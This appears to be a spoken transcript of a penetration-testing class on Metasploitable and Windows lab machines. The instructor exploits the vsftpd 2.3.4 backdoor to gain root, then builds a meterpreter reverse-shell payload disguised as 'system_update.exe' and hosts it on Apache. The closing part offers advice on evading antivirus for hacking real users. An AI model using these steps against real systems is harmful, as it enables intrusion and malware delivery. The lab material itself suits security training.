So in this session, we will discuss about vulnerability analysis and how we can hack a machine and enumeration. So
Okay.
basically, before enumeration, we will discuss about vulnerability analysis. So basically,
Okay.
yesterday we had discussed about how we can scan the network, about Wireshark, and how we can bypass the firewalls and IDS. Okay.
Yes.
Now, let's say, let me open the machine. Now, let's say my target machine is again metasploitable. Second, and my attacker machine is Kali Linux.
Yep.
So let's say we are scanning for the open ports, and we found that port number 21 is open of FTP on the target machine. And the service
Mhm.
running on this open port is VSFTPD 2.3.4. This service.
Okay.
So this is your open port. This is the service, and this is the version running on that open port. So what we can do
Mhm.
in this case, we have to check if this particular port is vulnerable or not. So how do we check? We can only check with the help of this particular version. So
Mhm.
there's come the vulnerability analysis. So here we have to check manually first, like how we can scan, how we can check if this port is vulnerable or not. So we have
Yep.
some various websites like some databases, for example, common weakness enumeration, common vulnerability and exposures database, and NIST database. So here we have three databases where we can search for this particular vulnerability. For example,
Mhm.
first we can search for in exploit DB. Second, we can search for in the NIST. Third, we can search for in the rapid 7. And then we can
Okay.
search for, let's see. So here we can search for exploit DB here.
Okay.
Can get this first URL. So Exploit DB is a platform where we have list of all these vulnerabilities. Okay. For example,
Mhm.
you can see we have this quick CMS, WordPress vulnerabilities, this given vulnerabilities, case store, etc. So what we can do,
Yep.
we can search for our version here. So our version is VSFTPD 2.3.4. So now you can see we have two results. First is VSFTPD backdoor command execution for the type remote and platform is Unix. And this is also verified. V means verified.
Okay.
Okay, A
Yep.
means your application and D means your download. You can download and date means when it is released. And
Mhm.
second is we have the same vulnerabilities, but we can exploit is using Metasploit. Now, what is
Okay.
Metasploit? So we have Metasploitable and we have Metasploit. So they are different. Metasploit is a
Mhm.
tool here. Okay. Metasploit is a tool which is used for so this is the main purpose of Metasploit. Metasploit is mainly used for exploiting a vulnerability. And then we have Metasploitable. Metasploitable is a vulnerable machine. So they are very different. Okay. Basically, names are
Okay.
common, but they are
Mhm.
different. They are different in many ways. Metasploitable is a machine which we are going to hack, and Metasploit is just a normal tool which we will use to exploit a vulnerability. Okay.
Okay.
So in the
Yep.
result, we have two options. First is this one, which is backdoor command execution, and second is backdoor command execution Metasploit. So this one, they both are same. Okay. First one is we can hack the machine without Metasploit, without any tool. And second, we
Yep.
can hack this machine with the help of Metasploit. So we can use any ways, we can approach both ways. Okay, you can click on this first URL and this one also.
Yep.
Okay, so they are all same. The difference is in the first one, we have to use it manually. And in the second one, we can use it with the help of a tool. Okay, that's our difference here. Now here you can see, now what is exploit? Exploit are a piece of code which we will go to use for hacking. Okay, like just going to, we can use it for exploiting a vulnerability. That is known as exploit. So this is an exploit and this is, you can see a piece of code here. So, and this is made up of Pythons. Okay, this
Yep.
code is made up of Python. So this is an exploit here. So what you can do, you can simply download this exploit from here, or you can, or we can download this one also, or this is, you can see they are different. The source code here, this is for the Metasploit and this is for the normal. They are different, but they will show the same what we can see result. Okay, so
Okay.
we will going to use the second one, which is Metasploit. Okay, first we will try with the help of a tool, and then we will try manually both.
Okay.
Okay, so this is a one way of finding if your port is vulnerable or not. Now we have successfully found that this particular version is vulnerable because we have found a vulnerability there. So here we can say that this particular version is vulnerable. Second way of
Okay.
finding is on the NIST database. So you can simply search for NIST vulnerability database. Then you can click on this first NVD. And here you can also search for a vulnerability. Okay, you can click on the search option. So here we can search for WSFTPD, which is very secure file transfer protocol daemon and 2.3.4. And then click on search. You can also apply their advanced search. Okay, now you can see we have the result. Vulnerability ID is this one, CVE, which is common vulnerability exposure. And this is the date of your of this release. This is a
Yep.
summary of the vulnerability, and this is the published date, the time, etc. And here you can see the severity of this vulnerability, which is very high and critical. So what this vulnerability will do, this will contain some backdoor which opens a shell on port number 6200 TCP. Okay,
Okay.
which means
Yep.
this vulnerability will provide you a command backdoor, which means you can access the target machine with the help of your machine. Okay, it is like a C2C connection, command and controls like
Yep.
connection. Okay, so with the help of NIST, we can also confirm, and then we have Rapid7. So we can also search for, even you can simply Google it. Okay, for example, you can simply search here VSFT PD 2.3.4 exploit. Okay, here it is Rapid7. You can also search here. Okay, you can see the same result.
Yep.
Backdoor command execution. And this is the description, author, and platform is Unix. And architecture is CMD. We can operate this with the help of CMD. It means command line. And this is how we can operate. Okay, this is like the steps we can use to hack this machine. Okay.
Okay.
Then more else, we can also search on, yeah. Then we can also search on this platform, which is CWE.org. And here we can search for VSFTPD 2.3.4. Okay, now here you can see no results. So here we have no results. So now we can search for the second. URL. Okay, again we can search here. The search option. And here we can search for BSFTPT 2.3.4. Okay, now here you can see we have results here also. First is for the first here we have this one for getting a backdoor, and second we have also for remote authorization, sorry, authentication users. Okay, so we have two vulnerabilities here. First one is quite common, but second one is not common. Second one is only we have found here only. Okay, so that is why each and every platform is different, and each and every platform might give you any different results.
Okay.
And third, here we have this NIST database. So here we have these platform where you can search for the vulnerabilities, and these are like the common ones. Or you can simply Google search it. Okay, now let's say you are searching on these database for any other vulnerabilities. Let's say your target is using PHP as a technology, or as a Apache as a service. Okay, let's say 2.3. Okay, now you are searching for if this particular version of Apache is vulnerable or not. And you go through these platforms. First this one, second this one, third this one, and so on. And you didn't find anything, any information about Apache 2.3. Then we can say that this particular version is fully secured. Then we can say this version is fully secured and you cannot hack this version. Okay. So if you didn't find anything in these platforms, which means that particular version is fully secure. And these are the main platform where you can look for the vulnerabilities, main platforms. Apart from these platforms, don't look for any other platform because these are the most popular platforms. Okay, if you found here, then it is fine. Otherwise, you will not going to find anywhere else. Okay, if you are searching for any other platform, then you may get any wrong information or wrong exploit or the exploit which will not work. Okay, but these are the platforms which are quite like useful and common. Okay, and they are like popular also. Now, whenever we are looking for any exploit, we have to make sure 2 points. First is we have to look for the exact version. Secondly, we have to look for the same operating system. Yours, we can say the target is operating. Okay, so first we have to look for the exact version. For example, we are looking for this one. So we have to look for 2.3.4 only. Okay, it cannot be 2.3.5 or 2.3.2. It is 2.3.4 only. Okay, first this point, and secondly, now my target is using Linux. I am that sure. Okay, because we have searched using the Linux, using the nmap, and we have found that the target is using Linux architecture. So we have to look for the same operating system the target is using. For example, the target is using CentOS. So we have to look for the exploit that can we apply on CentOS or on the Windows server or any platform. But your exploit or your target operating system, they both matches. That is very important. Otherwise, your exploit will not work. Okay. Yeah. First, we have to look for the exact version, and secondly, for the same operating system. Also, whenever you are looking for the exploit, you will come through this part. Let's say you are searching for again VSFTPD. And there, there's a mention 2.3.0 to 2.3.7. Okay, if this part is mentioned on any database or on any website, which means this particular exploit can be applied on 2.3.4 also. Okay, it can be applied from 2.3.0 to 2.3.7 versions. So then you can also apply this particular exploit. Okay. But if there's an exploit which mention 2.3.2 or 2.3.5, now you cannot apply these exploit on this particular person. Okay, they are invalid, or these are not, these will not work. But this will work, or this will work. Okay, so whenever you're looking for the exploit, make sure if this one is mentioned like the range of any person, then you can apply. Okay, make sure
Yeah.
your exploit lies within this range. And secondly, if these are mentioned, then this will not work because it is 2 and 5, and we are looking for the 4 here. Okay, and secondly, for the same operating system. For example, here we have the same operating system here, platform Unix. Okay, here you can also see this is for the Unix. You can click on here this CV and you can find more information.
Okay.
So base score is 9.8, which is very critical. And here you can go, like read about this particular vulnerabilities. Okay, here. So that is why these are very important, and it is applicable anywhere. For example, you are working in any company and you are performing vulnerability analysis and assessment. Then also you have to look for the exploits, or we can say CVE. CVE words is quite common in the companies, which is
Mhm.
common vulnerabilities and exposure, or common weakness exploits. So whenever you are looking for, whenever you are penetrating anything, you are like you are doing any vulnerability assessment or analysis, or you are performing any threat intelligence or analyst, you always look for CVE or CWE, or we can say experts. Okay, so these are
Mhm.
the main platform where you can look for. Otherwise, the last option is you can simply Google search. Okay, and whenever you are searching on Google, make sure to open a valid website. Okay, then only you can
Okay.
find the right expert.
Mhm.
Is it clear?
Yep, that's fine.
Okay. Now what we can do, we can start with the simple hacking. Okay. So for the system hacking, first we have to make sure which device we are hacking. So basically we are hacking Linux device. Okay. Why are
Yeah.
we hacking the machine? Now what is the purpose behind hacking? Because without purpose, you cannot hack any machine. You need a purpose of hacking. So basically our
Mm.
purpose is to learn anything. But for here, our purpose is to get the shell,
Okay.
or to get simply root access.
Mhm.
This is my purpose. Okay,
Yep.
to gain the root access. Second, what kind of tools are we going to use? That is, first, I will going to use nmap for scanning. Secondly, I will also going to use Nitto. Nitto is a vulnerability scanner application. Okay, it is a kind of a scanner,
Yep.
vulnerability scanner. And then we will use npIP scanner for scanning the IP address. And then we can also use Metasploit. Okay, these are the tools we are going to use. Now, then we can mention the process of hacking, or we can the methodology of hacking.
Mhm. Yep.
That is information gathering, scanning, and gaining access. Okay. So, and we don't want any maintaining access right now. So we will leave that, and also clearing traces, we will leave that. For now, we will keep it simple. We will start with the information gathering, scanning, and gaining access. Okay, so whenever you are hacking any machine, any real-time machine, or any machine for practice also, make sure to mention these points. Okay, these are important.
Okay.
So first, we will start with the collecting the IP address of target machine with the help of npIP scanner. So here
Mhm.
we can use, and here we can mention the range of the networks, which is 1.425. Okay, so IP address of your metasploitable machine is 192.168.143. So we can stop it. And here we can mention the IP 192.168.143. Now we know the IP. Now we can start scanning the machine. So for the scanning, we can open. Okay, so for now, we will apply a basic scan, nmap scan, nmap -SV for the version scanning, -A for the aggressive scan, -O for the operating system scan, and -T4 for speeding up the process, and then IP address of a target machine.
Okay.
Okay, so here, so basically many ports are open here. So we can check for other ports as well. We can also gain access through SSH. We can also gain access through Telnet. We can also gain
Yep.
access in this machine through this port, which is 53. We can also gain access through this 139, etc. Okay. So first we will target port number 21, which is VSFTPD 2.3.4. Now we know that this port is vulnerable. So what we can do, we can start scanning.
Yep.
Now here we can use NITTO. NITTO is a tool for, it is like a basic vulnerability scanning application. Okay.
Okay.
We
Yep.
can use it for just basic scanning and it is pre-installed. So we can simply use NITTO -H and then here you have to mention your target ID.
Mhm.
Okay, so with this, we will only get the basic information. First, the server is Apache 2.2.8 and Ubuntu. Secondly, PHP version is 5.2.4. More else, PHP info page is there on the website.
Mhm.
And there's a directory name doc, which is browsable, which we can open it. And then PHP my admin page is open, which may leak some information. Okay. And more else, we have this test directory, PHP info page, etc. Okay. And more else, you can see Apache 2.2.8 is outdated here.
Okay.
Okay, so this will show the basic information about the targets. Now we can start. Okay, now we can start hacking the machine. So we have done with the information gathering, scanning, and gaining access. Now this machine is very simple, and it is like we are doing it first time. So that is why it is very simple. And here we are following a very simple approach. So we are done with information gathering, scanning, and now we can move to simply a gaining access. And vulnerability analysis we have already done. Like how we can go through these on these platform and we can find if this version is vulnerable or not. That we have
Mhm.
done. Now we can open this Metasploit tool here. So how we can open it? So for the Metasploit to open, we have to run a command which is msf console.
Yeah.
So Metasploit is a application in which we have two parts. First part is msf venom and second part is msf console.
Mhm.
MSF Venom is mainly for creating a malwares with the help of Metasploit. You can create malwares, you can create payloads with the help of MSF Venom. Okay, for Windows, for Android, for other applications. And
Yeah.
MSF console is mainly for hacking that or exploiting the devices. Like you can exploit Windows, Linux, or any server or any target. So MSF Venom is for creating the malwares and MSF console for exploiting them. Okay. But we will going to use here MSF console here.
Yeah.
Okay, now here you can see we have in the Metasploit, we have 2315 exploits, 1205 auxiliary, 412 post, 975 payloads, and so on. Exploits, these are like the piece of code, uh, okay, which we can use for exploiting the vulnerability. 1205 auxiliary. Auxiliary means we can use these auxiliary for further information gathering. Let's say you want to gather information about any other device, then you can use auxiliary as well. Then 412 post and payloads. Post and payloads are mainly for hacking or putting the actual code in the exploit. That is post and payloads. Okay, like payloads are the main part of hacking any device. Okay, if exploits are not working, or if singly exploits are not working, then you can combine your exploit with the payloads. That will help. Then
Yeah.
46 encoders, 11 loops, and evasion. These are mainly for bypassing the firewalls. Okay,
Yeah.
so we will going to use exploits. So there's one more way of searching for the uh, version. Here is we can also search on the MSF console, or we can also use this command, which is search exploit on Linux. Okay, for example, here we can also search. For example, you can search here, search exploit, and you can mention your versions. PSFTPD 2.3.4. This command is only available on Linux. Okay, search exploit, and this is also pre-installed. Here you can also search for the version you are looking for. Okay,
Okay.
again you can see we have this the same result here. Okay, which is the same result as the exploit DB. So here we
Mhm.
can also use this. We have this backdoor command execution, and which is a Python file, and secondly a Metasploit, which is a Ruby file. Okay, so we can also search using search exploit, and you can also search here as well. For example, you can search here PSFTPD 2.3.4. Okay, and here you can see we have the result, which is exploit. First, we have this number, serial number, name of your exploit slash Unix slash FTP slash VSFTPD underscore 234 and vector. This is your disclosure date. Rank is excellent. Check no, which is not verified here. And this is the description here. Okay. Now what we can do, we can use this particular exploit. Okay, so how we can use it? Simply you can type use 0. 0 means this number you can mention, or you can mention the whole name of your exploit. You can copy from here and you can paste here. Okay, you can do this both ways. Either you can put here use and you can mention the entire name of your exploit, or you can also mention 0.
Okay.
0 for the number, serial number of this exploit.
Yeah.
Okay. Now you can see we are using this. Here, Unix FTP, we are using this particular exploit here. So now here we have to type show options. Basically, for hacking this machine, for the target machine, we have to set some options. Options are here: C host, which is a local client address; C port,
Yeah.
port address; proxies here you can apply, R host and R port. Now you can see the current setting, which is this one is set and rest are empty here. And then we have requirement. Requirement is no, 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 yes, yes. So whenever you see requirement yes, so that part is compulsory to fill. Without this part, you will not going to this exploit will not work. So this yes means this part is compulsory to fill, and no means it is not compulsory to fill. So we can leave these blank as it is because these are not compulsory, but we have to fill this part, our host part. And our port is already set here, 21. So now
Okay.
what is our host and our port? So basically it is our host, which is your remote host.
Okay. Yeah.
Remote host means your target machine. So here comes your target machine IP address. Okay, and then we have L host. L host means your local host. Which is your attacker machine.
Okay.
Okay, same goes with the L port and R port. R port means your remote port, on which port you are attacking, and L port from which port you are attacking. Okay, R port
Yep.
means our port is 21 because we are attacking on port number 21 on of the target machine. So that is why here we have this R port 21. L port is, you can also mention L port, which is not compulsory. Okay. So here we have to put this R host. So how we can set, for setting we can mention set R host. Okay, and this 192.168.143 IP address of your target machine. Enter. Now to check, you can simply use show options here. Okay, now you can see our host is set here, which is compulsory to fill. Okay, now we can check the show payloads option here. So you can type here show payloads. Okay, now you can see we don't have any payload for this particular exploit. We have this payload only, which is already set here. So we don't have any other payloads, and the payload which is available is already set here. So what we can do, we are done. We can simply type here run. We can type run here, or we can type here exploit. So you can type any command here, exploit for running and running for and run for running. We are saying. Okay. Now when I type run, so this payload, this particular exploit will start running and it started to exploit this particular IP address, which is your target machine. And when I click on enter, so this will take a few seconds.
Okay.
So now you can see exploit completed, but no session was created. So here we have this error here. So what we can do, we can start again, which is run. Okay, now you can see we have successfully gained access in the machine. You can see found shell.
Yeah.
And now here you can see we have gained access in the machine as a root user. Okay, as a root user.
Yeah.
And here you can see command shell 1, session 1 open. So if I type here ID or who am I, you can see I'm a root user here. Or if I type here ID, I'm a root user. If I type sysinfo, I guess this will work. This will not work. I can type here help here. Okay. Now these are the commands I can use to execute these commands on the target machine. So first I will type this shell to get a proper shell here.
Okay.
So if I type shell here, you can see it is here found bin bash.
Hey, excuse me, can you give me 1 minute?
Yeah, sure.
Okay, thank you. Hey, yes, I'm back.
So here you can see found bash, admin bash. Now we can apply more commands. Like you can type help here. And here we can upload files. We can check any files. For example, we can check our current location. So we are
Yep.
inside. You can see we are inside root here. Okay, now we have get the shell here. Now we can do anything in this machine. Basically, we are inside the target machine in this machine. So whatever the things we are going to do here, it will affect this machine. For example, if I type here uh, PWD, which is my location, this one is my location. Now I can move inside root.
Yep.
Okay, like I can move inside any directory, and here I can type ls. So these are the folders inside root. So you can create any folder here, you can upload any file, you can download any file from the machine, from the target machine to your machine. For example, I want to download this file. Okay, so I can write here, download file.txt. Source and destination. Okay, you have to mention a destination. So source, which is download. Here. One more. So what we can do, we can apply any other command, which is wget, or we can exit from this shell. And here we can type download and then file.txt. Okay, folder, but we are not downloading any, so let's try to upload.
Yep.
So what we can do, we can try to upload any file. Let's see. First one file. Still, again, not good. Source. So we can try the path here, the whole path, which is home file. Target file does not exist, but it is there. Let's try another file.
Yep.
Source and let me check this file.
Yep.
The file is empty, I guess. And if download isn't working, then we can use wget.
Yeah.
Wget is work in a reverse order. So so this command, I think it is not working. So I will check it. Okay. Then yeah.
Mhm.
And it's not working. So the command is not working. Internally, it is not working. You can see error occurred while uploading files. To home,
Okay.
can't find command on the written formatting binary. So if I check the home directory, ls, yeah. So there's some problem with the machine.
Yeah.
Okay, but the command is same. Here we have to use upload and the location of your file you want to upload and where you want to upload. Okay, the same we are
Yeah.
trying on the download here. Download the file we want to download is root file .tsv and where you want to keep inside home Kali and desktop. But this is also not working. Okay. So
Mhm.
the problem is, I think, with the machine. That is why it is not working. You can try in your machine because in my system the machine is very old. That is why maybe it is not working.
Okay.
Or maybe I'm in the virtual machine, virtual
Mm.
box, and my target machine is inside VMware. So that is why also it cannot, it may not work. Okay, because they are on the different platforms.
Okay.
You can try in your machine. Apart from download, upload, you can also run any other file, and these are the operation you can perform. These are the operation on the server. That is why we have limited operations here. But when we will hack Windows, we have many options. So let me exit. So basically, this is how we can gain access in the machine. Simply, you have to use your exploit, which is use 0. Then we have to use show options. Okay, we have to use 0, then show options. And here we have to set the ROs because it is compulsory and rest are not compulsory. And then here we can set the ROs with this IP address. Again, show options to recheck it and then run it. If one time it doesn't work, then you can use the second time. So in the second or third time, it will work. And then you will gain a shell. And then here you can type who am I. So what is our purpose? The purpose is to gain access as a root user. And we have successfully gained access as a root user. So the purpose is also fulfilled.
Yeah.
Any questions?
No, that's fine.
Okay. Now what we can do, we can try to hack Windows machine. So for the Windows machine, now we are going to hack a Windows desktop. So this is my target machine. Okay, and the attacker machine again is my Palo machine. So we can simply mention these steps. So the system hacking in this, we have this Windows machine as our target. Now, why we are hacking? To gain access inside the machine. And then the tools we are going to use. So here we will use again, we can use here Nmap for scanning the windows and Metasploit. Inside Metasploit, we will use MSF Venom and MSF Console. Okay, now basically there are like two ways of hacking the machine. First way of hacking the machine is to exploit a vulnerability. Second way is to send the malware and hack the machine. These are like two ways of hacking the machine. First, we can exploit a vulnerability. So this is we have done with the help of Metasploitable. In the Metasploitable, we have hacked the machine with the help of this vulnerability, which is VSFTPD and this one. In the second approach, we can also share the malware and then we can also hack the machine. So in this Windows second, we will share the malware to the Windows machine and then we will hack the machine. Okay. So for sharing the malware, first we have to create a malware. So we will create using MSF Venom. Okay. So first we will use MSF Venom. And then here we will use -p. P for your payload. What kind of payload you are going to use? So here we will use Windows /midoperator /reverse _ TCP. Okay, and then here we have to set lhost. What is lhost? Your local host means a local IP. So here lhost equal. So basically my lhost is 192.168.1.41. This is my local IP. Or I can check it. Okay. 141. So this is my local IP. And then local port. Now you can set any port here of your choice. So I'm setting here 1234. Any port of your choice. Okay. And then here you have to mention -f. F means your format of your payload. So basically format of your malware. So basically in the Windows we can run exe files, right? So exe is my format of my malware. And then name of a malware. So my malware name is, let's say, I can name it system_update. This is the name of my malware. system update. When I click on enter, the MSF banner will create the malware for me, including payload is this one, Windows, LOS to your local IP, LPort to your local port, and your format of your payload is exe file, and then your name of your file.
Okay.
Okay. Now here we are using Windows Metafrater reverse TCP. Okay, that I will explain. Now you can see payload size is 354 bytes, which means the payload has been successfully created. If I type ls here, you can see system update payload. Okay, this one is our payload. Now first step is to create a malware. Also, we can scan the Windows machine, but it is not compulsory to scan, but we can also scan the Windows machine. And we can use nmap and the same scan IP address of Windows machine that you can find with the help of net discover. Okay. So here I'm using CMD only.
Yep.
You can find it with the help of Angry IP scanner, or you can find it with the help of net discover. So IP address is 40. Scanning here is not compulsory because here we are approaching second method. We are using malware to hack the machine. So that is why scanning is not compulsory, but we can scan it, okay, for some information.
Yeah.
So in my Windows machine, so here port number 22 is open, which is SSH, and this is the MAC address. And you can see some guesses here, which is it can be Microsoft 11, and 92% is a chances that my machine or target machine is a Microsoft Windows 11, which is correct here. Okay. So only one port is open in my machine. So you can see we cannot hack the machine like my Windows machine with the help of open port because only one port is open. And here we are not sure if this port is vulnerable or not. That is why we leave this approach here. And we will follow the second approach, which is sharing the malware. So once the malware is created, now what we will do, we will share this malware. Okay. And before sharing, we have to start a server. Like how do you share this malware? So you can share with the help of email ID. You can also share with the help of any other platform. But here I will share with the help of a server. So for this, we will start a Apache server in the Linux machine. And Apache is pre-installed in your Linux. So you can search for service Apache start. And then we can check the status here, which is you can see up and running. Now, we have to, now this is my malware. So my malware is in this location. Okay, Apache is mainly for the websites. So basically what we are doing, we are uploading this malware in our website. So if you open my Windows machine and if you search for the IP address of Kali machine here, like 192.168.1 and 43, like this. So you will notice, sorry, this is IP address of Metasploit. Now you can see this web page is hosted on my Kali machine. So after I turn on my Apache, this web page, this particular document is hosted on my Kali machine. So what I will do, I will upload my malware on my website. So how I can do this? I can just copy my malware, cp copy my malware name, which is system update, and I will copy this in this location where www.html. So this is a location where your malware is, where your server file is located, and click on enter. Okay. Now we can move inside where HTML. And here you can see this is a malware system update. Okay. Now if someone type here your IP address slash your malware name, which is system underscore update .exe. So this will automatically download the malware. Okay. So if I run this one, so this will automatically download my malware. And before downloading on the Windows, what we have to do, we have to create a shell here. Okay, for example, here you have to type, let me move inside. MSF console. Now, once the malware is created, we can start the MSF console for executing your malware. Okay, so here, step number 2 is to start the Apache server and copy the malware file into the server location,
Okay.
which is where www.html. Step number 3 is to create a shell, or we can say to open the MSF console. Okay, for example, here MSF console. Now, what we can do here, we have to search, we have to use exploit slash multi slash handler here. Okay. Okay, spelling and okay. So basically, we are using this multi handler, and then here you have to write show options. Now here you can see we have to set the host, the L port, and the payload here. So you remember that whenever we are when we were typing the payload here, which is this one, MSF Venom. This is the payload. This is the command we have used. So here we have to set this payload. So the same payload we have used, we have to set there also, here also, the same host and the same L port. So the host, which is my host is 192.168 IP address of the Kali machine, attacker machine, 1.40.41, sorry. This is the IP of my Kali machine. And set L port. The L port I have used is 1234. Okay. So basically you have to use the same L port and same L host that you have used here. Okay, this is compulsory. And then set payload. And the same payload. So the payload we have used is this one, Windows meetup data reverse underscore TCP. So copy this one and here paste. And then you can type in show options. So here you can see L host is set, which is Kali IP, L port is set, and then here you can see payload is set. Everything is set here. Now what here we are doing? And before that, I can type run here. Now this is waiting for the connection. So now what are we doing here? See, first here in the payload, we are using Windows meetup reverse TCP. Now what is this reverse TCP? Let's say this is my attacker machine, Windows machine, and this is my attacker machine. Now here I'm creating a malware, which is here, this malware. Now I will share this malware to my Windows machine. Okay, I will share this malware to my Windows machine. Now my Windows machine will execute this malware. Now let's say this Windows machine is my victim here, or the Windows machine is my target here. Okay, so now my Windows machine will execute the malware. After executing the malware in my Windows machine, the Windows machine will share the reverse connection to my attacker machine. Reverse connection means a connection to connect to Windows machine. That is why it is known as reverse connection. So basically, there are two types of connections. First, we have bind connection. And second, we have reverse connection. Now, in this example, in the Windows and Linux example, let's say my target machine is Windows and Linux is my attacker machine. So bind connection means whenever my attacker machine, which is my Kali machine, is sharing the connection request to my Windows machines. That is a bind connection. So in this case, the attacker machine send the connection request to my Windows machine. This is known as bind connection. Okay.
Yeah.
So this is, you can see, a straightforward connection. The attacker machine, which you now I want to hack my Windows machine. So I am the attacker machine and I will share the connection request to my Windows machine. Now it's up to my Windows machine whether to accept the connection or not. So there's a 50-50 chances here. My Windows
Okay.
machine can also block my connection or it can also accept my connection. So it's up to Windows machine to accept my connection or not. Okay, this is a bind connection. Now let's say there's a firewall which is protecting my Windows machine. Okay, there's a firewall. So if my attacker machine is sharing the connection request, and obviously it is a malicious connection request because I want to gain access to my Windows machine. And for gaining access, I have to connect to a CMD of my Windows machine. Okay,
Yeah.
for example, just like we are connected to my Metasploitable machine through the command line, same as I want to connect to my Windows machine with the help of CMD. Means
Yeah.
whatever the commands I will apply in my Kali machine, that will be executed in my Windows machine, which means I can perform any number of operation in my Windows machine. Is it clear this much?
Yeah, that is clear.
So here I am sending the connection request to my Windows machine. It is like a direct connection request. Now it is like a malicious request. So the firewall or any security can block my connection on the Windows machine. So this attack
Okay.
is a failure. So that is why I will use a reverse connection. In the reverse
Yeah.
connection, my Windows machine, Windows machine will share the connection request to my Kali machine or to the attacker machine. Okay, and my attacker machine, which is waiting for the machine to hack, will accept the connection. So in this case, there's no firewall, no security will block my connection. Okay, that is
Okay.
known as reverse connection. And what kind of connection we are trying to make? We are making a TCP connection. Okay, a full TCP connection.
Yeah.
Okay, like we have first establish a handshake and then we will connect. So this is the meaning of this payload. Windows Meterpreter is for the MSF console. Meterpreter is like gaining a shell here. Okay, a kind of attack. And then reverse connection. I am gaining a reverse connection with the help of,
Yeah.
and it is like a TCP connection. Now there's a question
Yeah.
that why do the Windows machine send me the connection request? It is like Windows machine is asking me to hack me. Okay, like Windows machine is asking to hack itself. So why the Windows machine will send the connection request to Kali machine, to the attacker machine?
Yeah.
Because of this malware only. The malware we are creating, this malware will execute on the Windows machine, and with the help of this malware, the attacker machine, sorry, the Windows machine will send the connection request. And that is why in the malware, this is my malware command. That is why in the malware, I have mentioned the L host, which is your local host, your Kali IP here, and the Kali port here. Because I am mentioning in my malware that after executing the malware on the Windows machine, please send the request to this IP and to this port number. And here I am waiting for the connection to receive. That is why I have created this web here. It is like I am waiting for the Windows machine to send me the connection.
Yeah.
Okay. For example, you can think of a uh, for example, let's say Windows machine is my guest here, and Kali machine is my, let's say, owner here, the owner of the house. Let's say the Kali machine is throwing a party. Okay, Kali machine is throwing
Yeah.
a party. So before party, the Kali machine will send the invitation to the Windows machine. So in the invitation is your malware. Okay, that we have created. In the invitation, the Kali machine has mentioned the L host. L host means the address of the Kali machine. Okay, and L port, which is the venue and time of the Kali machine. So in the invitation, whenever you are inviting someone, you have to mention your address. That is why in the malware I have mentioned my address, which is the Kali address, the L host and L port here. And here, this is my invitation I am sharing to the Windows machine. Windows machine will open my invitation. And when the Windows machine open my invitation, Windows machine will accept it. Okay, it will accept
Okay.
and
Yeah.
come to my home, right?
Mhm.
But before inviting any guest, you have to prepare for the party, right? You have to decorate your home. So this is why we have decorate using MSF console. We have prepared a shell. We can say a shell, or we can say a kind of a, we have done a preparation so that we can accept the invitation of the Windows machine. And that is this preparation. We have started, we have choose a multi-handler here. We have set the
Mhm.
host here, the L port here, and then the payload here. This is my preparation I have done for inviting the Windows machine. And then I have
Okay.
apply run here. Now my preparation is done, and here I am waiting for the Windows machine to accept my connection. And when the Windows machine accept my connection, then the shell will be open here only. Okay.
Okay.
Is it
Yeah.
clear why are we applying reverse connection here and all?
Yeah. Yeah. That's fine.
Okay. Now we have to share this malware, which is the invitation to the Windows machine.
Mhm. Yeah.
So here, and before sending the invitation, we have to apply some settings in the Windows machine. You have to search for Windows security here. And here you have to click on this virus and threat protection. And this one manage settings here, which is virus and threat protection settings, manage settings. And you have to turn off this real time protection. Okay, you have
Mhm.
to turn
Yeah.
off this real time protection. And then you have to open the browser. Okay. And here you have to mention the IP address of the Kali machine slash your uh your malware name here. Okay, which is system update exe. And when I click on enter here, you can see there's a warning here. So you have to click on keep here. Okay, so the malware is blocked. What we can do, we can use a different browser. Let's say Brave. We can use Firefox. Okay, here you can type here the address, which is 192.168.143 slash system underscore update dot exe. And here you can click on enter. Not
Mhm.
found. System update. 43, sorry, 41 is like my IP address. Okay, you can see the system update and the malware has been downloaded successfully. You can see it. And
Mhm.
when you click on this file, you can see this is a malware inside a Windows machine. This is a malware. Okay, now see, what are we doing here? Before installing the malware in the Windows machine, we are turning off this Windows security here because there's a chance and there's a full 100% chance that your Windows machine will block your malware. So now what is the use of sending the malware if the Windows security will block it? So what is the purpose of sending? Let's say you want to hack my system. And for hacking my system, you cannot approach me to turn off my security. That is not possible for any hacker. So what is the purpose of even creating this malware if you cannot hack the machine without turning off the security? Right.
Yeah.
So this is
Mhm.
why here this Metasploit. So whatever the malware you are creating with the help of Metasploit or MSF Venom, those are useless. Those are
Okay.
useless for the real life scenarios. If you want to
Mhm.
hack someone in the real life, so that is like useless. But this is important for the examination. In the examination, you will going to face Windows 7 machine, not Windows 11 or Windows 10. Okay, you
Yeah.
will have Windows 7 machine as a target machine. And in the
Mhm.
Windows 7, no security will block this malware. That is why Windows 7 is vulnerable machine. And that is why we have the latest Windows 11 machine, which can block your malware. But Windows 7 machine cannot block this malware. Okay, because Windows machine is vulnerable. But in the real life scenario, this malware is useless if you are applying in the Windows 10 or Windows 11. So what we can do in that case, we can create our own malware. This we can create our own malware. Okay, for example, if you want to hack anyone in the in the real life scenario, any user, then in that case, you will not going to get any malware from the internet, not either not from the internet, not from the dark web, or not from the any tools. Like you cannot create the malware with the help of any tool. You cannot create any malware. You cannot download any malware from the internet, which can bypass the security of the Windows. So that is the thing here. You cannot have any malware which can bypass the malware. Sorry, bypass the security of Windows. Okay, so that is why you have to create your own malware. That is the thing you can do. And this malware you can create as a fully undetectable malware. The malware which you will create by yourself that can bypass the security of the Windows or any firewall. Okay. Again, it is not compulsory because the malware you are trying to create, it depends on two scenario. First scenario is how you are coding your malware. Okay. The way of coding your malware. Okay. And secondly, what kind of operation your malware can perform. So do you know how this antivirus works? So basically the antivirus works on two bases. First, it follow the approach of signature analysis. Signature analysis is like, for example, this malware, which is this current malware. This is a Windows malware. Okay, and it is created by MSF Venom. So MSF Venom is a very, a very outdated technology for creating the malware. So the signature of this malware is stored in the database of the antiviruses. So first, when any file or any malware came into your Windows machine or any machine, the antivirus checks for the signatures of the file. If the signature matches with the signature in the databases, then your file is malicious. This is the first approach. Second approach is behavior of your file. Behavior of the file means what kind of operations your file or your malware is performing inside a system. For example, this malware will create a backdoor, okay, a reverse connection. So this is a malicious behavior. So your antivirus will block this malware here only. Okay, so the antivirus works on two bases: signature approach, and second, behavior of your file. So you have to bypass these 2 points here. Then you can say your malware can bypass the security of the Windows or any other security. How you can bypass this? Signature analysis will totally depends on the code of malware. So you have to change the way of coding of your malware. For example, you are coding your malware with Python. Okay, so in the Python, you can change the way of coding. You can put your variable name differently. You can create many functions, etc.
Yeah.
